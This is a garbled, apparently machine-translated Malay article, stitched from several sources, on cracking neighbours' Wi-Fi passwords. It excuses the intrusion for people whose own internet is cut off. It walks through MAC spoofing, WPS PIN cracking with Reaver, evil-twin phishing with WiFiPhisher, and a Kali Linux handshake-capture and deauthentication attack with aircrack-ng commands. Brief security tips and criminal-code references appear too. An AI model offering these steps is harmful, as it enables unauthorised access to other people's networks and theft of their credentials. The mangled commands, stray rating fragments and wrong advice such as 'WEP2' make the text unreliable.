Pada asasnya, semua cadangan dari rangkaian di bidang ini adalah tidak masuk akal. Cadangan saya - masukkan sesuatu seperti "hacking wi-fi" di Google Play atau App Store, dan anda akan menjatuhkan keseluruhan pilihan program. Dan sudah ada mencari melalui ulasan dan tidak meletakkan apa-apa sampah palsu. Perisian kategori utama di sini:

  • Pilihan keselamatan untuk pusat akses anda sendiri
  • Tentukan kata laluan yang panjang dan kompleks dengan huruf besar dan kecil, urutan nombor secara rawak. Walaupun dengan seluruh paket data yang dipintas, penggodam akan diseksa untuk membunuh elektrik dan kuasa PC untuk memilih kombinasi. Muncul dengan nama pengguna dan kata laluan baru untuk perisian penghala akan membantu, kerana biasanya tidak ada yang mengubah duo admin / admin standard.
  • Jangan bergantung pada mac-adress. Perlindungan sedemikian adalah yang paling mudah retak.

Tanggungjawab

Ramai yang menulis tentang tanggungjawab untuk beberapa artikel Kanun Jenayah Persekutuan Rusia: 272, 273, 274. Masih di universiti, soalan ini dikaji dan kemudiannya mencurigakan. Berikut adalah nama-nama artikel:

272 - Akses haram ke maklumat komputer

273 - Pembuatan, penggunaan dan pengedaran program komputer yang berniat jahat

274 - Pelanggaran peraturan untuk operasi penyimpanan, pemprosesan atau penghantaran maklumat komputer dan rangkaian maklumat dan telekomunikasi

  1. Sebenarnya, hanya 272 yang tinggal di sini. Tetapi mari kita perhatikan lebih dekat:
  2. Akses yang tidak sah ke maklumat komputer yang dilindungi secara sah, jika tindakan ini mengakibatkan pemusnahan, penyekat, pengubahsuaian atau penyalinan maklumat komputer.
  3. Harap maklum bahawa penggunaan Internet, sekiranya tidak menyebabkan kerosakan, secara sederhana, sukar untuk dipasang di sini. Perkara lain jika trafik atau masa dikenakan, dan anda menggunakannya ... Tetapi pada masa ini tidak ada had wi-fi. Apa pun itu, saya secara kategoris tidak menyetujui penjahat dalam lingkaran dalam - bagaimanapun, kita semua adalah saudara, yang jika tidak kita.

Video penggodaman kata laluan Wi-Fi jiran dalam 5 minit

Program

Terdapat beberapa program penggodaman yang kuat untuk semua kesempatan. Saya cadangkan memperhatikan perkara berikut:

Windows - Keretakan WiFi

Kali Linux - Aircrack dan syarikat. Ini adalah penggodam Wi-Fi terbaik, kebanyakan manual dari YouTube mengenainya, termasuk video dari artikel ini, menyokong semua kaedah penggodaman, anda boleh menulis artikel yang berasingan dengan selamat. Sangat sesuai untuk bekerja dari komputer riba, tetapi anda juga boleh bekerja dari komputer menggunakan penyesuai Wi-Fi.

Kak-vzlomat-parol-ot-wi-fi-14.jpgKak-vzlomat-parol-ot-wi-fi-6-800x533.jpgH-wifi6.jpg.H-wifi11.jpg.Ketahui jiran Wi-Fi

(

3

Adakah mungkin untuk menggodam? - Ya, mungkin. Adakah mungkin untuk melindungi diri anda sepenuhnya? - Tidak, awak tak boleh. Kerana teknologi pada mulanya terbuka untuk sambungan pengguna.

272 Akses haram ke maklumat komputer

273 Pembuatan, penggunaan dan pengedaran program komputer yang berniat jahat

274 Pelanggaran peraturan pengoperasian alat penyimpanan, pemprosesan atau penghantaran maklumat komputer dan rangkaian maklumat dan telekomunikasi

Buku dan video yang berkaitan

anggaran, purata:

2.33

1 bintang

daripada 5)

Memuatkan ...

2 bintang

Dalam artikel hari ini, mari kita menyentuh topik halus: bagaimana menggodam rangkaian Wi-Fi. Seseorang akan bertanya, adakah itu sah? Tentu tidak, ia dianggap sebagai kesalahan yang serius, jadi jika seseorang memutuskan untuk melakukannya, mereka melakukannya dengan bahaya dan risiko mereka sendiri. Sudah tentu, ini boleh berlaku untuk semua orang apabila wang dalam akaun habis dan Internet dimatikan untuk anda. Dan pada masa ini keadaan force majeure muncul, ketika akses ke Internet sangat diperlukan. Jadi apa lagi yang perlu dilakukan? Betul, gunakan Internet Wi Fi yang berdekatan. Pilihan satu, tanyakan kepadanya kata laluan dari rangkaian WiFi, pilihan kedua, hack rangkaian WiFinya. Dan kami akan memberitahu anda bagaimana melakukan ini di bawah dalam artikel.

Rangkaian tanpa penyulitan

Sudah tentu, tidak ada orang tamak yang tidak menetapkan kata laluan pada rangkaian WiFi. Atau pengguna, semasa menyiapkan penghala, lupa memasangnya. Dalam kes sedemikian, tidak sukar untuk menyambung ke rangkaian ini. Cukup sekadar mengimbas siaran radio pada peranti anda, mencari rangkaian yang tidak dilindungi, klik padanya dan sambungkan. Dalam kes seperti itu, persoalan bagaimana menggodam rangkaian WiFi hilang dengan sendirinya.

Kami memilih kata laluan rangkaian Wi Fi secara manual Kami mencari WiFi dengan kekuatan isyarat tertinggi. Keutamaan diberikan kepada rangkaian tetangga atau rangkaian yang anda kenali pemiliknya. Nanti, anda akan faham mengapa demikian. Selalunya, pengguna yang tidak berpengalaman menetapkan kata laluan tanpa memikirkan kerumitan kata laluan yang ditaip. Dan semua fantasi mereka berakhir pada tarikh lahir, nama haiwan peliharaan, nama keluarga. Mengetahui jiran (pemilik) Wi-Fi, tidak sukar bagi anda untuk mencari kuncinya. Sekiranya tidak berjaya dengan pemilihan maklumat peribadi jiran, kami terus ke pilihan seterusnya, yang sangat popular di kalangan pengguna. Ini adalah kata laluan yang paling biasa, kami akan menyenaraikannya dalam jadual di bawah. , Salah satu kelebihan kaedah ini adalah kesederhanaannya, tetapi ada juga kekurangannya, salah satunya adalah masa yang perlu dihabiskan untuk kaedah ini. Terutama jika jiran telah menetapkan sekatan memasukkan kata laluan dan log masuk dalam tetapan penghala, maka setelah 3 percubaan yang tidak berjaya, percubaan berikutnya hanya dapat dilakukan pada keesokan harinya. .

3 bintang

Menggodam dengan menukar alamat MAC

Sebilangan pengrajin lebih suka menetapkan penapisan berdasarkan alamat MAC (alamat MAC adalah pengecam unik yang dimiliki setiap peranti) dan bukannya kata laluan. Semasa mengimbas, anda akan melihat rangkaian yang kononnya anda boleh berhubung tanpa masalah, tetapi apabila anda mencuba, anda akan gagal. Oleh itu, terdapat penapisan yang perlu anda bypass. Anda perlu mengetahui alamat MAC mana yang dibenarkan untuk disambungkan. Di sini program yang dapat mengimbas akan membantu anda, misalnya, Airodump-NG Pengimbas Alamat MAC Setelah mengetahui alamat MAC, anda boleh mula mengganti alamat MAC di komputer anda. Kita pergi ke " Mulakan "," Panel kawalan

4 bintang

"Cari" Pusat rangkaian dan Perkongsian "Di sebelah kiri atas, cari garis Menukar tetapan penyesuai rangkaian ". Kami memilih sambungan rangkaian yang aktif, klik padanya dengan butang tetikus kanan dan klik pada baris " Hartanah

5 bintang

". Di tetingkap yang muncul, kami dapati tab " Rangkaian "Dan klik pada butang"

Tune

". Kami mengaktifkan alamat rangkaian dan memasukkan MAC baru.

Terdapat utiliti yang sangat mudah untuk menggantikan Alamat MAC pada Windows 10

Technitium MAC Alamat Changer

  • dengan pertolongan yang mana anda akan cepat melakukannya. Kemudian disyorkan untuk memulakan semula PC. Selesai, jadi kami mengetahui bagaimana anda dapat menggodam Wi Fi berkat penggantian alamat MAC. Menggodam kata laluan WiFi menggunakan program Terdapat banyak program penggodaman di segmen ini, tetapi kita akan membincangkan yang paling popular. Keropok udara-ng .
  • Utiliti Aircrack-ng mempunyai ulasan baik dari pengguna. Ini adalah sekumpulan besar alat yang merangkumi: airodump, aireplay, aircrack, airdecap. Muat turun dan bongkar. Kami masuk ke folder " Tong sampah »Jalankan fail GUI Aircrack-ng
  • Di tab “ Nama fail "Anda perlu memilih dump yang akan menangkap paket dan kunci. Contohnya, anda boleh menggunakan utiliti KomView untuk WiFi untuk tujuan ini. Kami menetapkan jenis penyulitan yang dilindungi oleh rangkaian Wi-Fi: sama ada WEP
  • atau WPA Untuk pilihan WEP, anda mesti memberikan panjang kunci dan membatalkan di "

GUNAKAN serangan PTW

". Untuk pilihan WPA, cukup untuk menentukan kamus untuk meneka kata laluan.

Tindakan terakhir yang perlu dilakukan adalah dengan mengklik "

Lancarkan

  1. ". Keseluruhan proses penghitungan mengambil masa 2-5 minit.
  2. Kaedah kekerasan
  3. Inti kekuatan kasar adalah pilihan automatik lengkap dari semua pilihan kata laluan yang mungkin. Kaedah ini sesuai untuk pengguna yang maju, sangat sukar bagi pengguna biasa. Kaedah penggodam seperti ini sering digunakan untuk menggodam sistem pembayaran, bank dalam talian, dan akaun.

Sekiranya anda memutuskan untuk mencuba Brute force, ingatlah bahawa ciri PC memainkan peranan besar, jika komputer lemah, program dapat menganalisis selama beberapa hari. Pada masa ini, terdapat beberapa pilihan untuk "brute force": Peretasan peribadi. Ini berlaku ketika surat, akaun, laman web diretas. , Pemeriksaan Brutus. Terdapat perburuan besar di sini, 1-2 kata laluan tidak diperlukan oleh sesiapa sahaja, sebilangan besar kata laluan dari beberapa sumber besar menarik. .

Menggodam peranti komputer dibuat dari jauh.

  1. Aplikasi berfungsi dengan baik dengan kekuatan Brute: Brutus AET
  2. Pemeriksa Semua dalam Satu Pembuka Kata Laluan Appnimi
  3. Peretas untuk Windows - AirSlax, Wi-FI Sidejacking, CommView untuk WiFi, Dumpper AirSlax
  4. - utiliti yang menangkap paket di rangkaian Wi-Fi, di masa depan mereka diperlukan untuk memaksa kata laluan. Memetik kata laluan dengan enkripsi WPA, WPA2, WEP, dan juga kod pin WPS. Wi-FI Sidejacking

- cracker ini benar-benar percuma, beberapa tetapan, utiliti disajikan dalam bahasa Rusia, kami menyokong peranti mudah alih.

KomView untuk WiFi

  1. - sesuai untuk mana-mana OS Windows, utiliti menangkap dan menganalisis paket rangkaian. Bahasa Rusia hadir.
  2. Dumpper
  3. - utiliti ini pada penghala kita memecahkan kod PINnya. Kami melancarkan pengimbas. Dalam satu minit, anda akan mengetahui tentang semua komputer pada jarak beberapa meter. PIN ini diperlukan untuk beberapa utiliti untuk membantu anda memecahkan kata laluan WiFi anda.

Memecahkan kata laluan melalui kod Pin peralatan

  • Untuk mengetahui kata laluan melalui kod Pin peranti dengan penyulitan WPA, WPA2, anda memerlukan: Komputer riba atau komputer, jika anda mempunyai komputer, maka anda perlu mempunyai penyesuai Wi-Fi di atasnya. Pemacu denyar USB dengan sekurang-kurangnya 2 GB Program Juruaudit Keselamatan Tanpa Wayar Elcomsoft. Kami mengesyorkan bekerja di OS Linux, kerana semua prosedur lebih mudah dilakukan. Sekiranya ini tidak dapat dilakukan, semuanya akan berjaya di Windows. Kami memformat pemacu kilat USB dan memuat turun utiliti " »
  • WiFi Slax
  • ". Kami melancarkan program pada pemacu kilat dengan mengklik " Pemasang Boot Wifislax ". Kami menunjukkan parameter S dan klik " Masukan Kami but semula dan mulakan dari pemacu kilat kami.
  • Pilih untuk memulakan dari kernel SMP Panel kawalan
  • , dan wifislax c KDE , menunggu muat turun. Kami mengganti MAC komputer riba dengan melakukan di konsol " Panel kawalan
  • ifconfig wlan0 ke bawah SMP Panel kawalan
  • Kami buka " Macchanger , menunggu muat turun. ", Klik" Tukar MAC
  • Kami keluar dari utiliti dan di konsol jalankan " Kami melancarkan " minidwep-gtk

Imbas »Dan menjangkakan. Teknologi WPS jauh lebih mudah untuk digodam, jadi kami mengesyorkannya untuk pemula. .

Screenshot, pilih rangkaian wi fi

Selepas mengimbas, pilih mangsa dan klik "

Reaver

". Semua orang, mengharapkan kata laluan Wi Fi yang digodam Ada cara yang lebih mudah untuk mengenali Pin, berjalan-jalan untuk melawat jiran anda. Apabila dia pergi, ambil penghala dan putar, di sana anda akan melihat

Pin WPS Utiliti dengan sejuta kata laluan wi-fi

Terdapat kaedah lain untuk menggodam wi-fi orang lain, untuk ini anda hanya perlu memuat turun utiliti, kerana anda tidak perlu menggodam apa-apa, anda hanya perlu mencari titik terdekat dengan Internet. Peta Wi-fi

- Sesuai untuk sebarang alat. Idea aplikasi adalah untuk menukar kata laluan Wi-Fi di seluruh dunia. Utiliti tersebut akan mengeluarkan kata laluan ke rangkaian wi fi internet terdekat pada alat anda, tetapi hanya jika seseorang yang sebelumnya tersambung di sini dan memasukkan kata laluan, log masuk di peta Wi-fi.

WiFi Anda - Aplikasi ini sudah mempunyai sekitar 20 juta titik akses di seluruh dunia.

WiFi pantas - Kemudahan yang serupa dengan peta Wi-fi, prinsipnya sama. Pasang aplikasi, dan alat anda akan secara automatik menyambung ke rangkaian wayarles terdekat yang ada di pangkalan data program.

  1. Menggodam kata laluan dari telefon pintar anda
  2. Sambungan WPS - tujuan utama program ini adalah untuk menentukan seberapa rentan router yang menggunakan set Pin code secara lalai untuk menggodam wi-fi. Untuk menggunakan utiliti ini, peranti mesti di-root. WIBR +
  3. - bagus untuk telefon Android. Program ini secara serentak dapat melakukan beberapa tindakan untuk meneka kata laluan untuk dua rangkaian sekaligus.
  4. Muat turun dan pasang. Klik pada item " Tambah Rangkaian

»Dan tambahkan rangkaian dengan isyarat terbaik.

Kami meletakkan kotak pilihan dalam tetapan yang diperlukan. Klik pada

Tambah ke dalam barisan

... Selesai, utiliti akan memulakan kerjanya. Terdapat kelemahan kecil untuk aplikasi ini, setelah menghasilkan setiap kunci, ia perlu menyambung semula ke rangkaian. WiHack mudah alih

  1. - aplikasi ini sesuai untuk Windows dan Android. Untuk memecahkan kata laluan wi-fi, dia menggunakan dua pilihan yang dapat dipilih pengguna: brute force (brute force sederhana) atau pilihan analisis paket jauh lebih efisien. Lebih baik memasang versi penuh.
  2. Utiliti penggodam untuk iPhone
  3. Terdapat utiliti untuk iPhone yang dipanggil

Pesawat udara

, ia berfungsi mengikut pemintasan. Tidak akan ada kesukaran untuk bekerja dengannya, sederhana dan automatik. Muat turun, pasang dan jalankan. .

Kami mengimbas, memilih dari senarai rangkaian yang akan anda hack.

  • Kami menjangkakan sedikit, sudah selesai. Memancing Wi-Fi (pancingan data) , Kaedah penipuan ini demi mendapatkan kata laluan jarang digunakan. Intinya adalah untuk mengunjungi halaman phishing (dua halaman), pengguna, setelah memasukkan halaman ini, mempunyai kata laluan dan log masuknya. Sangat mudah bagi penyerang untuk mengenali data anda. Untuk mendapatkan maklumat rahsia mengenai rangkaian Wi-Fi, penggodam sering menggunakan utiliti. .
  • WiFiPhisher Menggunakan WiFiPhisher adalah mudah, anda perlu: и Membuat tetapan HTTP
  • HTTPS Mengimbas wlan0 wlan1 .
  • sehingga menyambung.
  • Penjejakan
  • DHCP

dan output

  1. alamat IP
  2. Memilih titik Wi-Fi.
  3. Kami membuat salinan titik akses, menulis nama yang serupa untuk rangkaian. Titik akses sebenar akan berfungsi lebih teruk, kerana ini, pengguna akan menyambung ke klon anda.
  4. Penyemak imbas akan meminta pengguna memasukkan log masuk, kata laluan. Oleh itu, data rahsia jatuh ke tangan keropok.
  5. Langkah yang perlu diambil untuk melindungi rangkaian WiFi anda
  6. Tetapkan kata laluan dengan gabungan huruf dan angka yang kompleks, bilangan aksara harus 8-12.
  7. Anda perlu mematikan WPS, kerana fungsi ini menjimatkan pengguna yang dibenarkan dan, apabila ditanya lagi, fungsi ini menghubungkannya secara automatik. Kadang-kadang perlu menukar PIN pada penghala dan melepaskan label kilang tempat PIN didaftarkan. Panel kawalan
  8. Jangan masukkan PIN anda di laman web yang tidak disahkan.

- Aplikasi "brute force". Untuk pengoperasiannya, muat turun pangkalan data tambahan diperlukan. Kemudian secara automatik mengambil kata laluan yang betul. Sesuai untuk Android.

Semasa mengkonfigurasi penghala, jangan gunakan jenis enkripsi WEP dan TKIP lama, gunakan jenis WEP2 yang lebih baru atau yang lain yang lebih maju.

Hadkan bilangan maksimum peranti yang disambungkan. Contohnya, anda mempunyai komputer riba dan tablet di rumah anda, jadi hadkannya kepada 2 peranti. Selepas itu, lebih daripada dua tidak akan bersambung.

Sembunyikan laman web anda. Tandakan kotak “

Sembunyikan SSID

Ingatlah untuk mengemas kini firmware pada penghala anda secara berkala.

Terdapat dua artikel Kanun Jenayah Persekutuan Rusia yang boleh digunakan untuk akses haram ke rangkaian. Ini adalah artikel 272 dan 273. Sesiapa yang berminat boleh membacanya di Internet. Kejadian dalam Artikel 272 adalah bahawa sangat sukar untuk membuktikan bahawa anda yang menggodam akses. Tetapi jika semasa penggodaman anda menggunakan program jahat (virus), maka artikel 273 Kanun Jenayah Persekutuan Rusia juga dapat diterapkan.

Kesimpulannya

Kami memberitahu bagaimana anda boleh menggodam kata laluan untuk wi-fi, maka keputusannya adalah milik anda, sama ada mahu menggodam masalah ini atau tidak. Sekiranya anda mempunyai dana yang mencukupi, tentu saja, anda hanya perlu ingat untuk mengisi semula Internet anda pada waktunya. Dan persoalan bagaimana anda boleh menggodam wi fi orang lain akan hilang dengan sendirinya. Dan tentu saja, anda tidak seharusnya menghilangkan faktor kegembiraan ketika anda kadang-kadang ingin membuktikan diri anda sekurang-kurangnya dalam sesuatu.

Anda juga boleh membaca:

  • Penulis artikel, terjemahan yang kami terbitkan hari ini, ingin membincangkan cara menggodam rangkaian Wi-Fi, yang protokol WPA dan WPA2 digunakan untuk melindungi.
  • Artikel ini ditulis untuk tujuan maklumat sahaja.
  • Perkakasan dan perisian
  • Saya akan menggunakan pengedaran Kali Linux yang dipasang di VMware Workstation.
  • Sebagai tambahan, saya mempunyai penyesuai Wi-Fi Alfa AWUS036NH 2000mW 802.11b / g / n. Berikut adalah ciri utamanya:
  • Piawaian: IEEE 802.11b / g / n, USB 2.0.

Kadar data: 802.11b - 11 Mbps, 802.11g - 54 Mbps, 802.11n - 150 Mbps.

Penyambung antena: 1 x RP-SMA.

Jalur frekuensi: 2412 ~ 2462 MHz, 2412 ~ 2472 MHz, 2412 ~ 2484 MHz. 
Bekalan kuasa: 5V.

Keselamatan: WEP 64/128, sokongan 802.1X, WPS, WPA-PSK, WPA2.

Langkah 1

Anda perlu menjalankan Kali Linux di VMware dan menyambungkan penyesuai Wi-Fi Alfa AWUS036NH ke sistem dengan mengikuti urutan langkah berikut:

VM> Peranti yang Boleh Dilepaskan> Ralink 802.11n Kad LAN Tanpa Wayar USB> Sambungkan

Menyambungkan penyesuai Wi-Fi ke OS yang berjalan di VMware

Langkah 2

Sekarang lihat alat untuk menguruskan sambungan Wi-Fi di Kali Linux.

Menguruskan Sambungan Wi-Fi di Kali Linux

Langkah 3

Buka terminal dan jalankan arahan

Menggunakan WiFiPhisher adalah mudah, anda perlu:

airmon-ng

untuk memaparkan maklumat mengenai antara muka rangkaian tanpa wayar.

Memaparkan maklumat mengenai antara muka rangkaian tanpa wayar

Langkah 4

Seperti yang anda lihat, antara muka telah diberi nama

... Mengetahui perkara ini, jalankan perintah di terminal

airmon-ng mula wlan0

... Berkat perintah ini, penyesuai Wi-Fi akan dimasukkan ke dalam mod pemantauan.

Memasang penyesuai ke mod pemantauan

Langkah 5

Sekarang jalankan arahan seperti ini:

airodump-ng wlan0mon 

... Ini akan membolehkan anda mendapatkan maklumat mengenai rangkaian Wi-Fi yang digunakan berdekatan, mengenai kaedah penyulitan yang digunakan di dalamnya, dan juga mengenai SSID.

Mengenai rangkaian Wi-Fi

Langkah 6

Sekarang mari kita gunakan arahan ini:

airodump-ng -c [channel] –bssid [bssid] -w / root / Desktop / [monitor antara muka]

Di dalamnya

[saluran]

harus diganti dengan nombor saluran sasaran,

.

[bssid]

- pada BSSID sasaran, 
[antara muka monitor]

- ke antara muka pemantauan

wlan0mon

Hasilnya, perintah saya akan kelihatan seperti ini:

airodump-ng -c 6 –sid 4C: ED: FB: 8A: 4F: C0 -w / root / Desktop / wlan0mon

Melaksanakan perintah

.

Langkah 7

Sekarang anda mesti menunggu. Utiliti

penyaman udara

akan memantau rangkaian, menunggu seseorang menyambung ke sana. Ini akan memberi kita peluang untuk mendapatkan fail berjabat tangan yang akan disimpan dalam folder

/ root / Desktop

Ini adalah bagaimana utiliti itu kelihatan sehingga seseorang yang tersambung ke rangkaian yang disiasat.

Program ini memantau rangkaian

Tetapi apa yang berlaku setelah sesuatu disambungkan ke rangkaian, dan program ini dapat memperoleh data yang diperlukan. 

Memperoleh data yang diperlukan

Langkah 8

Anda boleh melangkau langkah ini jika anda sudah mempunyai fail berjabat tangan. Kaedah alternatif untuk mendapatkan data yang sesuai dijelaskan di sini.

Kami bercakap tentang penggunaan arahan berikut:

Aireplay-Ng -0 2 -A [Router BSSID] -C [Pelanggan BSSID] WLAN0MON

Di sini

[Router bssid]

perlu menggantikan rangkaian Wi-Fi BSSID, dan

[Pelanggan BSSID]

- Pada pengecam stesen kerja.

Sekarang jalankan arahan seperti ini:

Perintah ini membolehkan anda mendapatkan data jabat tangan jika anda tidak mahu menunggu sambungan orang lain ke rangkaian. Malah, perintah ini menyerang penghala, melaksanakan pelaksanaan pakej. Parameter. 
  • -0 2. boleh digantikan dengan nombor lain, contohnya, untuk menentukan nombor 50, atau lebih, dan tunggu data jabat tangan
  • Menggunakan utiliti Aireplay-BG Langkah 9.
  • Aircrack-Ng -a2 -b [Router BSSID] -W [Laluan ke WordList] / Root / Desktop / * CAP -A2.
  • Bermaksud WPA. -B.

- Ini adalah rangkaian BSSID.

-W. 

- Ini adalah jalan menuju senarai kata laluan.

* .Cap.

- Ini adalah templat nama yang mengandungi kata laluan.

Добавить комментарий